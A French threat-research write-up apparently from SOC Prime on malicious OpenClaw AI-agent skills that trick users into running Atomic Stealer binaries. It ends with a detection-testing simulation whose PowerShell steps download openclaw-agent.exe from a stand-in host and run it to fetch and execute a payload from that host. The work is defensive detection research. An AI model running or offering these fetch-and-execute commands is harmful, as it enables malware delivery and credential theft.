SOC Prime Bias: Critique

04 Feb 2026 14:31 UTC

De l’Automatisation à l’Infection : Comment les Compétences de l’Agent IA OpenClaw Sont Armes

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Suivre
De l’Automatisation à l’Infection : Comment les Compétences de l’Agent IA OpenClaw Sont Armes
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

L’article explique comment les compétences malveillantes OpenClaw sont utilisées comme un mécanisme de diffusion de logiciels malveillants pour les utilisateurs de la plateforme d’agents IA autohébergée. Les acteurs menaçants publient des compétences qui semblent inoffensives mais finissent par inciter les victimes à télécharger et exécuter des binaires contrôlés par les attaquants à partir de sources externes. Les charges utiles observées comprennent des exécutables Windows et des fichiers macOS Mach-O qui ont été identifiés comme des variantes de la famille d’infostealers Atomic Stealer. Cette activité introduit un risque pratique pour la chaîne d’approvisionnement des stations de travail personnelles et de développement qui dépendent de compétences fournies par la communauté.

Enquête

VirusTotal Code Insight a examiné plus de trois mille compétences OpenClaw et a révélé des centaines qui montraient un comportement malveillant ou à haut risque. Dans un exemple, une compétence téléchargée par hightower6eu fournissait des instructions étape par étape pour télécharger une archive ZIP protégée par mot de passe depuis GitHub (mot de passe : openclaw) et exécuter openclaw-agent.exe sur Windows. Sur macOS, la même compétence dirigeait les utilisateurs vers un script encodé en Base64 depuis glot.io, téléchargeant ensuite un exécutable Mach-O pour exécution. Les binaires résultants ont été détectés par plusieurs moteurs de sécurité comme des infostealers truffés de chevaux de Troie.

Atténuation

Considérez les dépôts de compétences comme du code non fiable et exécutez OpenClaw dans un environnement sandboxé ou fortement contraint. Évitez de coller des commandes à partir de descriptions de compétences et n’exécutez pas de binaires récupérés à partir de liens externes non vérifiés. Pour les opérateurs de marché et de communauté, implémentez une analyse en temps de publication axée sur le comportement de téléchargement à distance, la logique de script obfusqué et les indicateurs de vol d’identifiants ou d’exfiltration de données. Dans les environnements d’entreprise, éduquez les utilisateurs sur les risques associés à l’installation de compétences communautaires et exigez une révision avant utilisation.

Réponse

Recherchez les paquets de compétences OpenClaw qui référencent des URL de téléchargement externes, des archives protégées par mot de passe ou des stagers de commandes encodés. Soyez vigilant sur l’exécution de binaires inconnus nommés openclaw-agent.exe et sur les lancements Mach-O suspects qui suivent une activité de téléchargement scriptée. Bloquez la connectivité aux domaines malveillants connus et isolez les systèmes impactés pour une analyse légale afin de confirmer si une exécution d’infostealer et une exposition d’identifiants ont eu lieu.

Flux d’attaque

Exécution de simulation

Prérequis : la vérification préliminaire de la télémétrie et de la ligne de base doit être réussie.

Rationnel : cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et la narration DOIVENT refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection.

  • Narratif de l’attaque et commandes :
    Un attaquant a obtenu un accès initial à une station de travail victime et dépose le binaire malveillant openclaw-agent.exe dans le répertoire temporaire de l’utilisateur. Le binaire est exécuté avec une ligne de commande contenant explicitement les mots-clés télécharger and exécuter pour récupérer des charges utiles supplémentaires depuis un serveur C2 non fiable et les exécuter en mémoire. L’attaquant utilise une invite de commande Windows standard pour éviter les détections spécifiques à PowerShell, correspondant ainsi aux attentes de la règle Sigma.

    1. Déposer la charge utile :
      $malPath = "$env:TEMPopenclaw-agent.exe"
      Invoke-WebRequest -Uri "http://malicious.example.com/openclaw-agent.exe" -OutFile $malPath
    2. Exécuter avec des arguments suspects :
      "%TEMP%openclaw-agent.exe" télécharger http://malicious.example.com/payload.bin exécuter
    3. L’agent contacte le serveur C2, télécharge payload.bin, l’écrit sur le disque, et le lance, tout en gardant la ligne de commande du processus d’origine contenant les mots déclencheurs.
  • Script de test de régression :

    # -----------------------------------------------------------------------
    # Simulation d'exécution de l'agent OpenClaw – déclenche la détection Sigma
    # -----------------------------------------------------------------------
    # 1. Téléchargez l'agent malveillant (simulé avec un fichier inoffensif)
    $agentUrl   = "https://github.com/microsoft/PowerShell/releases/download/v7.4.0/powershell-7.4.0-win-x64.msi"  # fichier inoffensif de remplacement
    $agentPath  = "$env:TEMPopenclaw-agent.exe"
    Invoke-WebRequest -Uri $agentUrl -OutFile $agentPath
    
    # 2. Exécutez l'agent avec les mots-clés attendus en ligne de commande
    $cmd = "`"$agentPath`" télécharger http://malicious.example.com/payload.bin exécuter"
    Write-Host "Exécution : $cmd"
    Start-Process -FilePath $agentPath -ArgumentList "télécharger http://malicious.example.com/payload.bin exécuter" -NoNewWindow -Wait
    
    # 3. Facultatif : Simulez le téléchargement de la charge utile (bouchon inoffensif)
    $payloadUrl = "https://raw.githubusercontent.com/EbookFoundation/free-programming-books/master/books/free-programming-books.md"
    $payloadPath = "$env:TEMPpayload.bin"
    Invoke-WebRequest -Uri $payloadUrl -OutFile $payloadPath
    
    Write-Host "Simulation complète. Vérifiez SIEM pour détection."
  • Commandes de nettoyage :

    # Supprimez tous les artefacts créés pendant la simulation
    $paths = @(
        "$env:TEMPopenclaw-agent.exe",
        "$env:TEMPpayload.bin"
    )
    foreach ($p in $paths) {
        if (Test-Path $p) {
            Remove-Item -Path $p -Force
            Write-Host "Supprimé $p"
        }
    }